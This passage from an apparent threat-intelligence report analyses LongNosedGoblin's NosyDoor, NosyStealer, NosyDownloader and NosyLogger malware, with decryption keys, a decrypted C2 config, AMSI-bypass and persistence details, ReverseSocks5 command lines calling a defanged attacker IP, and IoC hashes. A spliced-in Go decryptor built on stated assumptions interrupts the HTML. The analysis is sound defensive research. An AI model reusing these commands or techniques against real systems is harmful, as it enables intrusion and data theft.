href=\"https:\/\/github.com\/Fody\/Costura\">Costura<\/a>. It mainly contains code related to command processing, Microsoft OneDrive communication, and various helper methods, while the main binary handles the beaconing loop and reads a config file, utilizing the library.<\/p>\n<p>The configuration is stored in the file <span style=\"font-family: courier new, courier, monospace;\">log.cached<\/span> in encrypted form. NosyDoor decrypts it via XOR with key <span style=\"font-family: courier new, courier, monospace;\">SecretKey<\/span>, base64 decodes it, then decrypts it via AES with key <span style=\"font-family: courier new, courier, monospace;\">Thomas<\/span>, padded with null bytes until its length is 16, and IV <span style=\"font-family: courier new, courier, monospace;\">0<\/span>. 
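The layered scheme just described for log.cached, together with the task-file decryption with Payload.Key covered earlier, as an added Go example; this is neither NosyDoor's nor ESET's code. It assumes the .NET defaults the text does not spell out: CBC mode with PKCS#7 padding, "IV 0" meaning sixteen zero bytes, and "XOR with key SecretKey" meaning a repeating-key XOR over the file bytes. There is no real log.cached here: EncryptConfig applies the same scheme forward to a constructed JSON sample so that the decryptor has input to work on, and the Payload.Key value is the one from the configuration shown in Figure 4.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"fmt"
)

// padKey null-pads (or truncates) a string key to the AES-128 key length, as the post describes for "Thomas".
func padKey(s string) []byte {
	k := make([]byte, 16)
	copy(k, s)
	return k
}

// xorRepeat applies a repeating-key XOR; that this is how "XOR with key SecretKey" works is an assumption.
func xorRepeat(data []byte, key string) []byte {
	out := make([]byte, len(data))
	for i, b := range data {
		out[i] = b ^ key[i%len(key)]
	}
	return out
}

// aesCBC runs one direction of AES-CBC. "IV 0" is taken to mean 16 zero bytes (assumption).
func aesCBC(key, in []byte, newMode func(cipher.Block, []byte) cipher.BlockMode) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	if len(in) == 0 || len(in)%aes.BlockSize != 0 {
		return nil, fmt.Errorf("length %d is not a multiple of the AES block size", len(in))
	}
	out := make([]byte, len(in))
	newMode(block, make([]byte, aes.BlockSize)).CryptBlocks(out, in)
	return out, nil
}

// PKCS#7 is the .NET AES default padding; the post does not state otherwise, so it is assumed here.
func pkcs7Pad(b []byte) []byte {
	n := aes.BlockSize - len(b)%aes.BlockSize
	return append(append([]byte{}, b...), bytes.Repeat([]byte{byte(n)}, n)...)
}

func pkcs7Unpad(b []byte) ([]byte, error) {
	n := int(b[len(b)-1])
	if n == 0 || n > aes.BlockSize || n > len(b) || !bytes.Equal(b[len(b)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, fmt.Errorf("invalid PKCS#7 padding (wrong key or corrupted file?)")
	}
	return b[:len(b)-n], nil
}

// aesDecryptB64 is the inner step shared by both paths: base64 decode, AES-CBC decrypt with IV 0, unpad.
func aesDecryptB64(b64 string, key []byte) ([]byte, error) {
	ct, err := base64.StdEncoding.DecodeString(b64)
	if err != nil {
		return nil, err
	}
	pt, err := aesCBC(key, ct, cipher.NewCBCDecrypter)
	if err != nil {
		return nil, err
	}
	return pkcs7Unpad(pt)
}

// DecryptConfig reverses the three layers of log.cached: XOR "SecretKey", base64, AES with "Thomas" null-padded.
func DecryptConfig(raw []byte) ([]byte, error) {
	return aesDecryptB64(string(xorRepeat(raw, "SecretKey")), padKey("Thomas"))
}

// DecryptTask recovers a command from a task file body: base64, then AES with Payload.Key and IV 0.
func DecryptTask(body, payloadKey string) ([]byte, error) {
	return aesDecryptB64(body, padKey(payloadKey))
}

// aesEncryptB64 and EncryptConfig run the scheme forward only to construct sample inputs for the demo.
func aesEncryptB64(plain, key []byte) (string, error) {
	ct, err := aesCBC(key, pkcs7Pad(plain), cipher.NewCBCEncrypter)
	if err != nil {
		return "", err
	}
	return base64.StdEncoding.EncodeToString(ct), nil
}

func EncryptConfig(plain []byte) ([]byte, error) {
	b64, err := aesEncryptB64(plain, padKey("Thomas"))
	return xorRepeat([]byte(b64), "SecretKey"), err
}

func main() {
	const key = "583oq23aonxloet7" // Payload.Key from the Figure 4 configuration
	cfg := []byte(`{"ListenerID":3,"Sleep":66,"Payload":{"Key":"` + key + `"}}`) // constructed sample
	enc, _ := EncryptConfig(cfg)
	dec, err := DecryptConfig(enc)
	fmt.Printf("log.cached -> %s (err=%v)\n", dec, err)
	task, _ := aesEncryptB64([]byte("whoami"), padKey(key)) // constructed task file body
	cmd, err := DecryptTask(task, key)
	fmt.Printf("task -> %s (err=%v)\n", cmd, err)
}
```

A response file is the same base64 body wrapped between the PayloadPrepend and PayloadAppend markers (Fames and Ipsum in Figure 4), so the text between those markers can be fed to DecryptTask with the same Payload.Key. If DecryptConfig reports a padding error on a real sample, the first things to vary are the XOR convention and the padding mode, not the key strings, which the text states.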
This configuration can be seen in Figure\u00a04.<\/p>\n<pre class=\"language-markup\"><code>{\n    \"ListenerID\": 3,\n    \"FolderName\": \"Duis euismod, mi, ligula, mattis feugiat, pulvinar.\",\n    \"AppID\": \"[redacted]\",\n    \"RefreshToken\": \"[redacted]\",\n    \"BaseUrl\": \"https:\/\/graph.microsoft.com\/v1.0\/drive\",\n    \"TokenUrl\": \"https:\/\/login.microsoftonline.com\/common\/oauth2\/v2.0\/token\",\n    \"CodeType\": \".NET40\",\n    \"AgentType\": \"OneDrive\",\n    \"Scope\": \"offline_access files.readwrite\",\n    \"Sleep\": 66,\n    \"BeginDate\": \"08:51:00\",\n    \"EndDate\": \"18:51:00\",\n    \"Payload\": {\n        \"Key\": \"583oq23aonxloet7\",\n        \"MetaDataName\": null,\n        \"TaskFolderName\": \"Risus blandit mattis\",\n        \"ReceiveFolderName\": \"Felis posuere at\",\n        \"Prepend\": \"\n\n    \n    <meta http-equiv=\"&quot;Content-Type&quot;\" content=\"&quot;text\/html;\" charset=\"iso-8859-1&quot;\"\/>\n    <title>IIS Windows Server<\/title>\n    \n    \n    \n        <div id=\"&quot;container&quot;\">\n        <a rel=\"nofollow\" target=\"_blank\" href=\"&quot;http:\/\/go.microsoft.com\/fwlink\/?linkid=66138&amp;clcid=0x409&quot;\"><img decoding=\"async\" src=\"&quot;iisstart.png&quot;\" alt=\"&quot;IIS&quot;\" width=\"&quot;960&quot;\" height=\"&quot;600&quot;\"\/><\/a>\n        <\/div>\n    \n\",\n        \"PayloadPrepend\": \"Fames\",\n        \"PayloadAppend\": \"Ipsum\"\n    }\n}<\/code><\/pre>\n<p style=\"text-align: center;\"><em>Figure\u00a04. Decrypted configuration (<\/em><span style=\"font-family: courier new, courier, monospace;\">log.cached<\/span><em>, beautified)<\/em><\/p>\n<p>The configuration values <span style=\"font-family: courier new, courier, monospace;\">&lt;BeginDate&gt;<\/span> and <span style=\"font-family: courier new, courier, monospace;\">&lt;EndDate&gt;<\/span> specify the local time range when NosyDoor operates. 
In this case, NosyDoor is active only between 8:51 am and 6:51 pm. Once authenticated, though, NosyDoor will process commands that are still pending in a queue and send response files regardless of what time it is.<\/p>\n<h3>NosyStealer<\/h3>\n<p>NosyStealer is used to steal browser data from Microsoft Edge and Google Chrome. As illustrated in Figure\u00a05, it has a four-stage chain of execution, with the stealer component being the final-stage payload.<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 5. NosyStealer execution chain\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/12-25\/longnosedgoblin\/figure-5-1.png\" alt=\"Figure 5. NosyStealer execution chain\" width=\"\" height=\"\"\/><figcaption><em>Figure 5. NosyStealer execution chain<\/em><\/figcaption><\/figure>\n<h4>NosyStealer Stage 1 \u2013 DLL loader<\/h4>\n<p>The first stage (<span style=\"font-family: courier new, courier, monospace;\">pmp.exe<\/span>) in the NosyStealer chain is a C\/C++ application. The observed sample simply loads a library named <span style=\"font-family: courier new, courier, monospace;\">SERV.dll<\/span> from disk and calls the exported function <span style=\"font-family: courier new, courier, monospace;\">Hello<\/span>.<\/p>\n<h4>NosyStealer Stage 2 \u2013 injector<a rel=\"nofollow\" target=\"_blank\" id=\"NosyStealer Stage 2 \u2013 injector\"\/><\/h4>\n<p>We observed two NosyStealer Stage 2 samples \u2013 one (<span style=\"font-family: courier new, courier, monospace;\">SERV.dll<\/span>) in our telemetry, and the other (<span style=\"font-family: courier new, courier, monospace;\">msi.dll<\/span>) uploaded to <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.virustotal.com\/gui\/file\/5959d4414cc6764212679eec7c9ed5911eed6d24f310bc7b9ba570e11b84be8f\">VirusTotal<\/a> from Malaysia. 
Neither has the exported function <span style=\"font-family: courier new, courier, monospace;\">Hello<\/span>, but both have the main code in <span style=\"font-family: courier new, courier, monospace;\">DllMain<\/span>, i.e., the malicious code runs right after the DLL is loaded. They have the following exports:<\/p>\n<ul>\n<li><span style=\"font-family: courier new, courier, monospace;\">??0Cv2dllnoinject@@QEAA@XZ<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">??4Cv2dllnoinject@@QEAAAEAV0@$$QEAV0@@Z<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">??4Cv2dllnoinject@@QEAAAEAV0@AEBV0@@Z<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">?fnv2dllnoinject@@YAHXZ<\/span><\/li>\n<li><span style=\"font-family: courier new, courier, monospace;\">?nv2dllnoinject@@3HA<\/span><\/li>\n<\/ul>\n<p>The next-stage data is loaded from the hardcoded path <span style=\"font-family: courier new, courier, monospace;\">C:\\ProgramData\\Microsoft\\WDF\\MDE.dat<\/span>. It is decrypted via a single-byte XOR cipher with key <span style=\"font-family: courier new, courier, monospace;\">0x7A<\/span>. 
The result is <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/github.com\/TheWover\/donut\">Donut<\/a> shellcode that is injected into the running <span style=\"font-family: courier new, courier, monospace;\">pmp.exe<\/span> process (NosyStealer Stage 1) using the <span style=\"font-family: courier new, courier, monospace;\">CreateRemoteThread<\/span> API in the <span style=\"font-family: courier new, courier, monospace;\">SERV.dll<\/span> case, and into a newly created <span style=\"font-family: courier new, courier, monospace;\">notepad.exe<\/span> process using the <span style=\"font-family: courier new, courier, monospace;\">SetThreadContext<\/span> API in the <span style=\"font-family: courier new, courier, monospace;\">msi.dll<\/span> case.<\/p>\n<h4>NosyStealer Stage 3 \u2013 loader<a id=\"NosyStealer Stage 3 \u2013 loader\"><\/a><\/h4>\n<p>As mentioned in the <em><a href=\"#NosyStealer Stage 2 \u2013 injector\">NosyStealer Stage 2 \u2013 injector<\/a><\/em> section, this stage is shellcode containing an embedded PE file that is decrypted, loaded, and executed in memory using Donut\u2019s reflective loader. The extracted binary is a C\/C++ application.<\/p>\n<p>Like <em><a href=\"#NosyDoor Stage 2 \u2013 AppDomainManager injection\">NosyDoor Stage 2 \u2013 AppDomainManager injection<\/a><\/em>, this stage uses a known technique to bypass AMSI. It patches the <span style=\"font-family: courier new, courier, monospace;\">AmsiScanBuffer<\/span> function in the loaded <span style=\"font-family: courier new, courier, monospace;\">amsi.dll<\/span> with code that returns <span style=\"font-family: courier new, courier, monospace;\">E_INVALIDARG<\/span> (see Figure\u00a06).<\/p>\n<figure class=\"image\"><img decoding=\"async\" title=\"Figure 6. 
Hex-Rays decompiled code that patches AmsiScanBuffer\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/2025\/12-25\/longnosedgoblin\/figure-6.png\" alt=\"Figure 6. Hex-Rays decompiled code that patches AmsiScanBuffer\"\/><figcaption><em>Figure 6. Hex-Rays decompiled code that patches <\/em><span style=\"font-family: courier new, courier, monospace;\">AmsiScanBuffer<\/span><\/figcaption><\/figure>\n<p>Then it creates a Windows scheduled task with the name Daily Check Task that runs <span style=\"font-family: courier new, courier, monospace;\">C:\\ProgramData\\Microsoft\\WDF\\pmp.exe<\/span> (NosyStealer Stage 1) every day with the permissions of the local system account.<\/p>\n<p>After patching the AMSI function and persisting, it continues similarly to the previous stage \u2013 it decrypts the next stage from the hardcoded path <span style=\"font-family: courier new, courier, monospace;\">C:\\ProgramData\\Microsoft\\WDF\\mfd.dat<\/span> via a single-byte XOR cipher with key <span style=\"font-family: courier new, courier, monospace;\">0x7A<\/span>, where the resulting blob is another Donut shellcode, which is then executed.<\/p>\n<h4>NosyStealer Stage 4 \u2013 payload<\/h4>\n<p>Again, like <em><a href=\"#NosyStealer Stage 3 \u2013 loader\">NosyStealer Stage 3 \u2013 loader<\/a>,<\/em> this stage is shellcode that decrypts, loads, and executes an embedded PE file in memory using Donut\u2019s reflective loader. This time, the extracted binary is a Go application that steals browser data from the Microsoft Edge and Google Chrome web browsers. To do so, it downloads a file named <span style=\"font-family: courier new, courier, monospace;\">config<\/span> from Google Docs. 
When the file contains a victim\u2019s ID, NosyStealer reads Microsoft Edge and Google Chrome profile data, archives it with tar, and encrypts it with a custom cipher.<\/p>\n<p>NosyStealer then exfiltrates the encrypted tar archive to Google Drive. Figure\u00a07 is an example of the JSON-formatted configuration, embedded in the binary, required to access Google Drive and Google Docs.<\/p>\n<pre class=\"language-markup\"><code>{\n  \"type\": \"service_account\",\n  \"project_id\": \"dev0-411506\",\n  \"private_key_id\": \"[redacted]\",\n  \"private_key\": \"[redacted]\",\n  \"client_email\": \"dev0-660@dev0-411506.iam.gserviceaccount.com\",\n  \"client_id\": \"[redacted]\",\n  \"auth_uri\": \"https:\/\/accounts.google.com\/o\/oauth2\/auth\",\n  \"token_uri\": \"https:\/\/oauth2.googleapis.com\/token\",\n  \"auth_provider_x509_cert_url\": \"https:\/\/www.googleapis.com\/oauth2\/v1\/certs\",\n  \"client_x509_cert_url\": \"https:\/\/www.googleapis.com\/robot\/v1\/metadata\/x509\/dev0-660%40dev0-411506.iam.gserviceaccount.com\",\n  \"universe_domain\": \"googleapis.com\"\n}<\/code><\/pre>\n<p style=\"text-align: center;\"><em>Figure\u00a07. NosyStealer configuration<\/em><\/p>\n<p>NosyStealer also logs errors and status messages to a Google Docs file named <span style=\"font-family: courier new, courier, monospace;\">log<\/span>, which may include information from multiple victims. The status message includes the constant <span style=\"font-family: courier new, courier, monospace;\">9<\/span>, likely an indication of the NosyStealer version. 
The full status message format, where <span style=\"font-family: courier new, courier, monospace;\">&lt;machine_local_ips&gt;<\/span> represents a list of local IPv4 addresses of the network adapters, is as follows:<\/p>\n<p><span style=\"font-family: courier new, courier, monospace;\">&lt;local_date&gt; &#8211; &lt;victim_id&gt; &#8211; 9 &#8211; heartbeat &lt;machine_local_ips&gt;<\/span><\/p>\n<h3>NosyDownloader<\/h3>\n<p>Analyzing ESET telemetry data, we also found in the networks compromised by LongNosedGoblin various originally benign applications that had been patched with malicious code. This code contains a downloader that we named NosyDownloader, which executes a chain of obfuscated commands passed to a spawned PowerShell process as one long command line argument, meaning that the script is not saved on disk. Each subsequent stage is encoded with base64, and the last one is additionally deflated with gzip.<\/p>\n<p>Each stage is briefly described in Table 3. Like NosyDoor Stage 2 and NosyStealer Stage 3, the second stage here also bypasses AMSI. In this case, NosyDownloader uses Matt Graeber\u2019s reflection method and script-logging-disabling techniques made available on GitHub to bypass AMSI.<\/p>\n<p style=\"text-align: center;\"><em>Table\u00a03. 
NosyDownloader script stages<\/em><\/p>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"66\"><strong>Stage<\/strong><\/td>\n<td width=\"577\"><strong>Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"66\">1<\/td>\n<td width=\"577\">Decodes and executes Stage 2 in a newly created PowerShell process that runs in a hidden window.<\/td>\n<\/tr>\n<tr>\n<td width=\"66\">2<\/td>\n<td width=\"577\">Bypasses AMSI, then decodes and executes Stage 3.<\/td>\n<\/tr>\n<tr>\n<td width=\"66\">3<\/td>\n<td width=\"577\">Decodes, decompresses, and executes Stage 4.<\/td>\n<\/tr>\n<tr>\n<td width=\"66\">4<\/td>\n<td width=\"577\">Downloads a payload and executes it in memory with <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/learn.microsoft.com\/en-us\/powershell\/module\/microsoft.powershell.utility\/invoke-expression?view=powershell-7.4\">Invoke-Expression<\/a>.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>We suspect that NosyDownloader was used to deploy ReverseSocks5, NosyLogger, and an argument runner, as we observed them within one week after NosyDownloader was executed.<\/p>\n<h3>NosyLogger<\/h3>\n<p>We also identified a C#\/.NET keylogger that we named NosyLogger. 
It seems to be a modified version of the open-source keylogger <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/github.com\/zorggomat\/DuckSharp\">DuckSharp<\/a>, with the main differences being that it doesn\u2019t send emails or translate logged keys into the Cyrillic alphabet.<\/p>\n<p>The malware initially checks whether a debugger is present via the <span style=\"font-family: courier new, courier, monospace;\">IsDebuggerPresent<\/span> and <span style=\"font-family: courier new, courier, monospace;\">CheckRemoteDebuggerPresent<\/span> APIs; if not, it starts its keylogging functionality.<\/p>\n<p>Window name, pressed keys, and pasted clipboard content are accumulated in memory. NosyLogger encrypts these data batches using AES with the key <span style=\"font-family: courier new, courier, monospace;\">D53FCC01038E20193FBD51B7400075CF7C9C4402B73DA7B0DB836B000EBD8B1C<\/span> and a <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/learn.microsoft.com\/en-us\/dotnet\/api\/system.security.cryptography.symmetricalgorithm.generateiv\">randomly generated<\/a> initialization vector of fixed length, where the vector is appended to the encrypted batch of data. The encrypted data batch is then appended to the file at the hardcoded location <span style=\"font-family: courier new, courier, monospace;\">C:\\Windows\\Temp\\TS_D418.tmp<\/span> in hexadecimal string format. In that file, each encrypted data batch is separated by a newline followed by the string <span style=\"font-family: courier new, courier, monospace;\">ENDBLOCK<\/span>. This process of encrypting the accumulated data and storing it to the file takes place every 10 seconds. 
This file is not exfiltrated by NosyLogger.<\/p>\n<h3>Other deployed tools<\/h3>\n<h4>ReverseSocks5<\/h4>\n<p>Among other malware deployed by LongNosedGoblin, we found an open-source reverse SOCKS5 proxy, written in Go, called <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/github.com\/Acebond\/ReverseSocks5\">ReverseSocks5<\/a>. We discovered it when we noticed the following command line arguments being used:<\/p>\n<p><span style=\"font-family: courier new, courier, monospace;\">-connect 118.107.234[.]29:8080 -psk \"58fi04qQ\" \/F<\/span><\/p>\n<p>The option <span style=\"font-family: courier new, courier, monospace;\">-psk<\/span> is used to set a preshared key for encryption and authentication. The argument <span style=\"font-family: courier new, courier, monospace;\">\/F<\/span> is not handled by ReverseSocks5 and is probably unintentional; this argument is commonly used with <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/learn.microsoft.com\/en-us\/windows-server\/administration\/windows-commands\/schtasks-create\">schtasks create<\/a>.<\/p>\n<p>We then noticed another set of command line arguments (which no longer had the <span style=\"font-family: courier new, courier, monospace;\">\/F<\/span> argument):<\/p>\n<p><span style=\"font-family: courier new, courier, monospace;\">-connect 118.107.234[.]29:8080 -psk \"15Kaf22N3b\"<\/span><\/p>\n<p>This second set corresponds to an execution of ReverseSocks5 where we observed PowerShell as the parent process. 
NosyDownloader was also executed during this time, indicating that the sample was probably deployed with it.<\/p>\n<h4>Argument runner<\/h4>\n<p>This is a C#\/.NET application with the internal name <span style=\"font-family: courier new, courier, monospace;\">Binary<\/span>; the sole purpose of this tool is to run an application passed as an argument. We observed the filename <span style=\"font-family: courier new, courier, monospace;\">TCOEdge.exe<\/span> as part of the command line, along with arguments that are specific to the <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/ffmpeg.org\/\">FFmpeg<\/a> multimedia framework; it was used to record the screen and capture audio, saving the result to <span style=\"font-family: courier new, courier, monospace;\">C:\\Windows\\Temp\\output.avi<\/span>.<\/p>\n<h2>Conclusion<\/h2>\n<p>LongNosedGoblin is a China-aligned APT group that targets governmental entities in Southeast Asia and Japan. Our analysis of its campaigns revealed numerous pieces of custom malware, which the group uses to conduct cyberespionage against its victims. Notably, LongNosedGoblin employs Group Policy to perform lateral movement across the compromised network.<\/p>\n<blockquote>\n<div><em>For any inquiries about our research published on WeLiveSecurity, please contact us at <a rel=\"nofollow\" target=\"_blank\" style=\"background-color: #f4f4f4;\" href=\"mailto:threatintel@eset.com\">threatintel@eset.com<\/a>.\u00a0<\/em><\/div>\n<div><em>ESET Research offers private APT intelligence reports and data feeds. 
For any inquiries about this service, visit the <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.eset.com\/int\/business\/services\/threat-intelligence\/?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=wls-research&amp;utm_content=longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan&amp;sfdccampaignid=7011n0000017htTAAQ\">ESET Threat Intelligence<\/a> page.<\/em><\/div>\n<\/blockquote>\n<h2>IoCs<\/h2>\n<p>A comprehensive list of indicators of compromise (IoCs) and samples can be found in <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/github.com\/eset\/malware-ioc\/tree\/master\/longnosedgoblin\">our GitHub repository<\/a>.<\/p>\n<h3>Files<\/h3>\n<table style=\"width: 781px;\" border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td style=\"width: 209px;\"><strong>SHA-1<\/strong><\/td>\n<td style=\"width: 191px;\"><strong>Filename<\/strong><\/td>\n<td style=\"width: 254.797px;\"><strong>Detection<\/strong><\/td>\n<td style=\"width: 302.203px;\"><strong>Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">4E3F6E9D0F443F4C4297<wbr\/>4A0551EEE957B498DA3D<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">History.ini<\/span><\/td>\n<td style=\"width: 254.797px;\">MSIL\/Spy.Agent.EUU<\/td>\n<td style=\"width: 302.203px;\">NosyHistorian.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">CD745BD2636F607CC4FB<wbr\/>9389535BF3579321CA72<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">History.ini<\/span><\/td>\n<td style=\"width: 254.797px;\">MSIL\/Spy.Agent.EUU<\/td>\n<td style=\"width: 302.203px;\">NosyHistorian.<\/td>\n<\/tr>\n<tr>\n<td 
style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">154A35DD4117DB760699<wbr\/>C2092AFB307E94008506<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">Registry.plo<\/span><\/td>\n<td style=\"width: 254.797px;\">MSIL\/TrojanDropper<wbr\/>.Agent.GBQ<\/td>\n<td style=\"width: 302.203px;\">NosyDoor stage 1.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">B1D4A283A9CCC9E34993<wbr\/>DD2093A904AFBD88B9B9<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">Registry.pol<\/span><\/td>\n<td style=\"width: 254.797px;\">MSIL\/TrojanDropper<wbr\/>.Agent.GBQ<\/td>\n<td style=\"width: 302.203px;\">NosyDoor stage 1.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">77D2A8CB316B7A470E76<wbr\/>E163551A00BB16A696C5<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">Registry.plo<\/span><\/td>\n<td style=\"width: 254.797px;\">MSIL\/TrojanDropper<wbr\/>.Agent.GBQ<\/td>\n<td style=\"width: 302.203px;\">NosyDoor stage 1.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">F93E449C5520C4718E28<wbr\/>4375C54BE33711505985<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">Registry.pol<\/span><\/td>\n<td style=\"width: 254.797px;\">MSIL\/TrojanDropper<wbr\/>.Agent.GBQ<\/td>\n<td style=\"width: 302.203px;\">NosyDoor stage 1.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">1959E2198D6F81B2604D<wbr\/>F7AC1F508AEB7A6FA07E<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">SharedReg.dll<\/span><\/td>\n<td style=\"width: 
254.797px;\">MSIL\/Kryptik.AJBA<\/td>\n<td style=\"width: 302.203px;\">NosyDoor stage 2.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">E0B44715BC4C327C04E6<wbr\/>3F881ECC087B7ACBD306<\/span><\/td>\n<td style=\"width: 191px;\">N\/A<\/td>\n<td style=\"width: 254.797px;\">MSIL\/Agent.ESF<\/td>\n<td style=\"width: 302.203px;\">NosyDoor stage 3.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">43C8AE8561E7E3BF9CD7<wbr\/>48136C091099E5CBEEEE<\/span><\/td>\n<td style=\"width: 191px;\">N\/A<\/td>\n<td style=\"width: 254.797px;\">MSIL\/Agent.ESF<\/td>\n<td style=\"width: 302.203px;\">NosyDoor stage 3.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">D11FC2D6159CB8BA392B<wbr\/>145B3EE4ADFA15DB4C83<\/span><\/td>\n<td style=\"width: 191px;\">N\/A<\/td>\n<td style=\"width: 254.797px;\">MSIL\/Agent.ESF<\/td>\n<td style=\"width: 302.203px;\">NosyDoor stage 3.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">A0A80AC293645076EBAE<wbr\/>393FF0A6A4229E2EDE1C<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">pmp.exe<\/span><\/td>\n<td style=\"width: 254.797px;\">Win64\/Agent.DNY<\/td>\n<td style=\"width: 302.203px;\">NosyStealer stage 1.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">DDBBAE33E04A49D17DD2<wbr\/>4D85B637667B4407AE19<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">SERV.dll<\/span><\/td>\n<td style=\"width: 254.797px;\">Win64\/Agent.DNX<\/td>\n<td style=\"width: 302.203px;\">NosyStealer stage 2.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, 
monospace;\">60158C509446893B3B57<wbr\/>D40DC4B4B3795FCDF369<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">HPSupportAssistant<wbr\/>.exe<\/span><\/td>\n<td style=\"width: 254.797px;\">PowerShell\/TrojanDown<wbr\/>loader.Agent.JJO<\/td>\n<td style=\"width: 302.203px;\">NosyDownloader.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">F5B7440EE25116A49EC5<wbr\/>EE82507B353880217AC1<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">RTLWVern.exe<\/span><\/td>\n<td style=\"width: 254.797px;\">PowerShell\/Agent.BDR<\/td>\n<td style=\"width: 302.203px;\">NosyDownloader.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">85939C56BFCACD0993E6<wbr\/>FB9F7CFD6137601FB7D4<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">hpSmartAdapter.exe<\/span><\/td>\n<td style=\"width: 254.797px;\">Win32\/Agent.AGIJ<\/td>\n<td style=\"width: 302.203px;\">NosyDownloader.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">C66F9FEC0F8CBF577840<wbr\/>944F61198A75B3E2A58C<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">hputils.exe<\/span><\/td>\n<td style=\"width: 254.797px;\">Win32\/Agent.AGII<\/td>\n<td style=\"width: 302.203px;\">NosyDownloader.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 209px;\"><span style=\"font-family: courier new, courier, monospace;\">4C2FCCE3BAB4144D90C7<wbr\/>41A6D77ADF209C786B54<\/span><\/td>\n<td style=\"width: 191px;\"><span style=\"font-family: courier new, courier, monospace;\">IGCCSvc.exe<\/span><\/td>\n<td style=\"width: 254.797px;\">MSIL\/Spy.Key<wbr\/>logger.FVW<\/td>\n<td style=\"width: 302.203px;\">NosyLogger.<\/td>\n<\/tr>\n<tr>\n<td style=\"width: 
